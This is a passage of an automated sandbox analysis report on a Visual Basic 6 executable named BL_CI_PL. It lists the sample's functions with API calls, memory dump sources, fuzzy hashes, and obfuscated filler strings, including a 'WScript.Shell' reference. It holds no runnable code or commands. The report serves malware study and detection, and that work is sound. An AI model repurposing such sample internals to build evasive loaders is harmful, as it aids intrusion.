                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 812c45a778884eff900b41ef01df1354608706fd9d03eed53e6fd652f66c2699
                                                                                                                                                      • Instruction ID: 81b441c1601e1dd88d108a5a040f3f09a91338d02b02817eaa987e55ea0eee14
                                                                                                                                                      • Opcode Fuzzy Hash: 812c45a778884eff900b41ef01df1354608706fd9d03eed53e6fd652f66c2699
                                                                                                                                                      • Instruction Fuzzy Hash: 79814D759083868BDF35DF388DA83DA7BA1EF52350F5582AECC9A4F289D7344182C716
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02B401BF, Relevance: .0, Instructions: 48COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ab2ba23bc754776db7188cbabbd77faaa50f4e762f4e9083508c7166c2d4eadd
                                                                                                                                                      • Instruction ID: 0792a2c6e3023df0ce7f8ee532a2b0e1abafbdf90b795d5c27bceaaddcb0484e
                                                                                                                                                      • Opcode Fuzzy Hash: ab2ba23bc754776db7188cbabbd77faaa50f4e762f4e9083508c7166c2d4eadd
                                                                                                                                                      • Instruction Fuzzy Hash: 66112534A04785CFCF38EE18C894BEA33A1BF55314F404AAADD499B250CB709A80DF51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02B3C3FE, Relevance: .0, Instructions: 8COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: af37dfe216eef99b94b4ec7fbfb52f42e2d66fc3ecbaf83107faef61ad311ce7
                                                                                                                                                      • Instruction ID: 86cf10df26703fcde45826b39da93012633eb2a11d92079e907d341a1c4086ad
                                                                                                                                                      • Opcode Fuzzy Hash: af37dfe216eef99b94b4ec7fbfb52f42e2d66fc3ecbaf83107faef61ad311ce7
                                                                                                                                                      • Instruction Fuzzy Hash: CDC092B23826818FFB41DF18D692B4073B0FF21AD8B080494E482CFA12C324E910CA00
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02B40A79, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                                                                                                                      • Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
                                                                                                                                                      • Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02B3F791, Relevance: .0, Instructions: 4COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                                                                      • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                                                                                                                                      • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                                                                      • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041DD70, Relevance: 135.1, APIs: 68, Strings: 9, Instructions: 390COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041DDE8
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041DDF0
                                                                                                                                                      • #538.MSVBVM60(?,0000087E,00000002,00000001), ref: 0041DDFF
                                                                                                                                                      • __vbaVarTstEq.MSVBVM60(?,?), ref: 0041DE21
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041DE2C
                                                                                                                                                      • #612.MSVBVM60(?), ref: 0041DE3B
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041DE45
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DE56
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041DE5B
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041DE82
                                                                                                                                                      • #618.MSVBVM60(?,0000002D), ref: 0041DE8E
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DE99
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(Leona,00000000), ref: 0041DEA1
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DEB3
                                                                                                                                                      • #512.MSVBVM60(sphagnumets,00000032), ref: 0041DEC9
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DED4
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041DEE8
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,02BEEA7C,0040339C,00000014), ref: 0041DF0D
                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000001), ref: 0041DF29
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000138), ref: 0041DF4D
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041DF5D
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041DF69
                                                                                                                                                      • #702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041DF89
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DF94
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041DF99
                                                                                                                                                      • #610.MSVBVM60(?), ref: 0041DFA3
                                                                                                                                                      • #553.MSVBVM60(?,?), ref: 0041DFB1
                                                                                                                                                      • #696.MSVBVM60(Anslagskraftens), ref: 0041DFBC
                                                                                                                                                      • __vbaVarTstLt.MSVBVM60(00008002,?), ref: 0041DFDB
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041DFED
                                                                                                                                                      • #539.MSVBVM60(?,0000008C,000000EA,00000005), ref: 0041E00F
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041E01F
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E026
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E02B
                                                                                                                                                      • #669.MSVBVM60 ref: 0041E031
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E03C
                                                                                                                                                      • #629.MSVBVM60(?,?,00000005,?), ref: 0041E06A
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041E074
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E07B
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E080
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?), ref: 0041E094
                                                                                                                                                      • __vbaLenBstr.MSVBVM60(SIDESTILLER), ref: 0041E0A2
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041E110), ref: 0041E0EF
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E0F4
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E0F9
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E0FE
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E103
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E108
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E10D
                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 0041E137
                                                                                                                                                      • __vbaVarDup.MSVBVM60(-00000001,00000000,6FA0D8B1), ref: 0041E1AE
                                                                                                                                                      • #632.MSVBVM60(?,?,000000E6,00000002), ref: 0041E1C5
                                                                                                                                                      • __vbaVarTstEq.MSVBVM60(?,?), ref: 0041E1EA
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 0041E206
                                                                                                                                                      • #536.MSVBVM60(?), ref: 0041E226
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E237
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E23C
                                                                                                                                                      • __vbaLenBstrB.MSVBVM60(Operationalise), ref: 0041E255
                                                                                                                                                      • #574.MSVBVM60(00000003,0000000A,000000FF,00000000), ref: 0041E270
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E27B
                                                                                                                                                      • #711.MSVBVM60(?,00000000), ref: 0041E282
                                                                                                                                                      • __vbaAryVar.MSVBVM60(00002008,?), ref: 0041E291
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$List$Copy$BstrCheckHresult$#512#536#538#539#553#574#610#612#618#629#632#669#696#702#711ErrorNew2Overflow
                                                                                                                                                      • String ID: Anslagskraftens$Leona$N$NEGLIGERS$Operationalise$PREFAVOURABLY$SIDESTILLER$Toothed$sphagnumets
                                                                                                                                                      • API String ID: 1098405350-3309045338
                                                                                                                                                      • Opcode ID: c630fc53bfa4ed97c1d1d416e18143dc08e2fa76197760c80614a00b22123062
                                                                                                                                                      • Instruction ID: 619195fb2b5566fb5b21aa5d9deb070e07f84790da865bf45a13783e1b4f6e3b
                                                                                                                                                      • Opcode Fuzzy Hash: c630fc53bfa4ed97c1d1d416e18143dc08e2fa76197760c80614a00b22123062
                                                                                                                                                      • Instruction Fuzzy Hash: 02F12BB1D00219ABDB04DFE4DD89ADDBBB8FF48700F10812AE516B72A4DB745A49CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041EBD0, Relevance: 86.0, APIs: 43, Strings: 6, Instructions: 264COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • #610.MSVBVM60(?), ref: 0041EC41
                                                                                                                                                      • #553.MSVBVM60(?,?), ref: 0041EC4F
                                                                                                                                                      • #648.MSVBVM60(?), ref: 0041EC67
                                                                                                                                                      • __vbaVarTstLt.MSVBVM60(?,?), ref: 0041EC89
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,0000000A,?), ref: 0041ECA5
                                                                                                                                                      • #539.MSVBVM60(?,000000FB,000000A8,000000D6), ref: 0041ECC6
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041ECD6
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041ECE3
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041ECE8
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041ED16
                                                                                                                                                      • #629.MSVBVM60(0000000A,?,000000E5,00000002), ref: 0041ED2D
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(0000000A), ref: 0041ED37
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041ED3E
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,0000000A), ref: 0041ED4E
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041ED75
                                                                                                                                                      • #524.MSVBVM60(?,?), ref: 0041ED83
                                                                                                                                                      • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041ED97
                                                                                                                                                      • #523.MSVBVM60(00000000), ref: 0041ED9A
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EDA5
                                                                                                                                                      • #696.MSVBVM60(00000000), ref: 0041EDA8
                                                                                                                                                      • #698.MSVBVM60(0000000A,00000000), ref: 0041EDB6
                                                                                                                                                      • #518.MSVBVM60(?,0000000A), ref: 0041EDC4
                                                                                                                                                      • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041EDD2
                                                                                                                                                      • #527.MSVBVM60(00000000), ref: 0041EDD5
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EDE0
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(konkurrencedygtige,00000000), ref: 0041EDE8
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0041EE0A
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,0000000A,?), ref: 0041EE22
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041EE50
                                                                                                                                                      • #717.MSVBVM60(?,?,00000080,00000000), ref: 0041EE61
                                                                                                                                                      • __vbaVar2Vec.MSVBVM60(?,?), ref: 0041EE6F
                                                                                                                                                      • __vbaAryMove.MSVBVM60(?,?), ref: 0041EE7D
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041EE8D
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041EEAC
                                                                                                                                                      • #619.MSVBVM60(?,?,00000014), ref: 0041EEB8
                                                                                                                                                      • #520.MSVBVM60(0000000A,?), ref: 0041EEC6
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(0000000A), ref: 0041EED0
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EEDB
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,?,0000000A), ref: 0041EEEB
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041EF59), ref: 0041EF40
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041EF48
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041EF51
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041EF56
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$List$#518#520#523#524#527#539#553#610#619#629#648#696#698#717DestructVar2
                                                                                                                                                      • String ID: Doernes2$Krag4$UOPLYSTHEDS$\$hearsay$konkurrencedygtige
                                                                                                                                                      • API String ID: 1351758486-1457662506
                                                                                                                                                      • Opcode ID: bcd9c481ca9dbd07cfc3f840c2be69661c4f87d3e6035f966cbaa0f33183c1ea
                                                                                                                                                      • Instruction ID: 6ed5db7314f4084a728e08582945a58ac84eefb6c67ebfb851d5e04832b82301
                                                                                                                                                      • Opcode Fuzzy Hash: bcd9c481ca9dbd07cfc3f840c2be69661c4f87d3e6035f966cbaa0f33183c1ea
                                                                                                                                                      • Instruction Fuzzy Hash: EFB1F9B2C002199BDB14DFE4DE84EDEBBB8FB48700F10811AE506B7154DB746A49CFA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041E330, Relevance: 84.2, APIs: 39, Strings: 9, Instructions: 195COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041E399
                                                                                                                                                      • #514.MSVBVM60(?,00000009), ref: 0041E3A5
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E3B6
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(Lifestyle4,00000000), ref: 0041E3BE
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E3D0
                                                                                                                                                      • __vbaStrCat.MSVBVM60(Fluxroot,?), ref: 0041E3EA
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E3F1
                                                                                                                                                      • __vbaStrCat.MSVBVM60(Certif,00000000), ref: 0041E3F9
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E400
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E405
                                                                                                                                                      • #717.MSVBVM60(?,?,00000040,00000000), ref: 0041E423
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041E42D
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E438
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E43D
                                                                                                                                                      • #698.MSVBVM60(?,00002742), ref: 0041E454
                                                                                                                                                      • __vbaVarTstEq.MSVBVM60(?,?), ref: 0041E470
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E47F
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041E4B5
                                                                                                                                                      • #632.MSVBVM60(?,?,000000CB,?), ref: 0041E4CC
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041E4D6
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E4E1
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041E4F1
                                                                                                                                                      • #696.MSVBVM60(Hanebaand), ref: 0041E4FF
                                                                                                                                                      • #713.MSVBVM60(UNCLEANER,?), ref: 0041E515
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E520
                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041E523
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E52A
                                                                                                                                                      • #651.MSVBVM60(?,00000000), ref: 0041E531
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E53C
                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041E53F
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E546
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041E556
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E562
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,0041E5C7), ref: 0041E5A1
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E5B0
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E5B5
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E5BA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Move$Free$List$#514#632#651#696#698#713#717CopyDestruct
                                                                                                                                                      • String ID: A$Certif$Epharmonic$Fluxroot$Hanebaand$Kisteklder$Lifestyle4$UNCLEANER$wanness
                                                                                                                                                      • API String ID: 1225124453-3253074281
                                                                                                                                                      • Opcode ID: 11756a7145e70ebdfdf651005c01d662b05c865a73cadb1ffc4d30b73b4c1e91
                                                                                                                                                      • Instruction ID: 85cfcd5c77c2aec3e891b78752cd5a7d2c5993808130f8995984a85c909f5de0
                                                                                                                                                      • Opcode Fuzzy Hash: 11756a7145e70ebdfdf651005c01d662b05c865a73cadb1ffc4d30b73b4c1e91
                                                                                                                                                      • Instruction Fuzzy Hash: 0F71C5B5D00208ABDB04DFE5DD849EEBBB8FF58301F10812AE506B72A4DB745A89CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041F200, Relevance: 70.3, APIs: 35, Strings: 5, Instructions: 298COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,00401386), ref: 0041F21E
                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401386), ref: 0041F257
                                                                                                                                                      • #646.MSVBVM60(0000000A), ref: 0041F276
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F281
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(ANCHIETEA,00000000), ref: 0041F28D
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F2A2
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F2AB
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041F2D7
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040339C,00000014), ref: 0041F328
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000078), ref: 0041F370
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041F393
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041F3B3
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040339C,00000014), ref: 0041F404
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000138), ref: 0041F455
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041F470
                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF), ref: 0041F47F
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041F494
                                                                                                                                                      • #618.MSVBVM60(?,000000F9), ref: 0041F4AA
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F4B5
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(Eighteenth4,00000000), ref: 0041F4C1
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F4D5
                                                                                                                                                      • #616.MSVBVM60(Skdyrets5,00000037), ref: 0041F4F5
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F500
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041F519
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040339C,00000014), ref: 0041F56A
                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000001), ref: 0041F5A3
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000138), ref: 0041F5D6
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 0041F5F8
                                                                                                                                                      • __vbaFreeObj.MSVBVM60(?,?,00401386), ref: 0041F604
                                                                                                                                                      • #702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041F62B
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F636
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F63F
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041F69B), ref: 0041F682
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F68B
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F694
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$CheckHresult$Move$New2$Copy$#616#618#646#702ChkstkErrorList
                                                                                                                                                      • String ID: ANCHIETEA$Eighteenth4$Skdyrets5$UNFACTUALNESS$hjreparentesernes
                                                                                                                                                      • API String ID: 2120662567-2651150714
                                                                                                                                                      • Opcode ID: 440854f701d1ac5518b5c67c70b3024554193268f1dee532f3d93b72497ac5df
                                                                                                                                                      • Instruction ID: 9c81a08efbc458a56486b3bccad7c80358eaf98f123583cf4d62379da1fbc287
                                                                                                                                                      • Opcode Fuzzy Hash: 440854f701d1ac5518b5c67c70b3024554193268f1dee532f3d93b72497ac5df
                                                                                                                                                      • Instruction Fuzzy Hash: 24D12D74A00318DFDB14DFA0D948BDDBBB4BF48705F20816AE506BB2A1DB745A85CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041E5F0, Relevance: 61.4, APIs: 28, Strings: 7, Instructions: 156COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$List$#518#536#561#619#631#716AddrefCopy
                                                                                                                                                      • String ID: Korrektrernes5$NONVENOMOUSNESS$STUBCHEN$Skibakkerne$WScript.Shell$klovdyr$v
                                                                                                                                                      • API String ID: 1348390723-3911151726
                                                                                                                                                      • Opcode ID: f2ea3b4a58298805e3a474dcff101e822541a89d7113bda211a1523e9c8cea8b
                                                                                                                                                      • Instruction ID: 9d4dc52f1e133472b1b2247dafdf3e12305d3b6978b84aa4e67fb766f95605d5
                                                                                                                                                      • Opcode Fuzzy Hash: f2ea3b4a58298805e3a474dcff101e822541a89d7113bda211a1523e9c8cea8b
                                                                                                                                                      • Instruction Fuzzy Hash: E661E9B5C00259ABDB04DFA4D9889DEBFB8FF58704F10412AE506B72A0DB746689CF94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

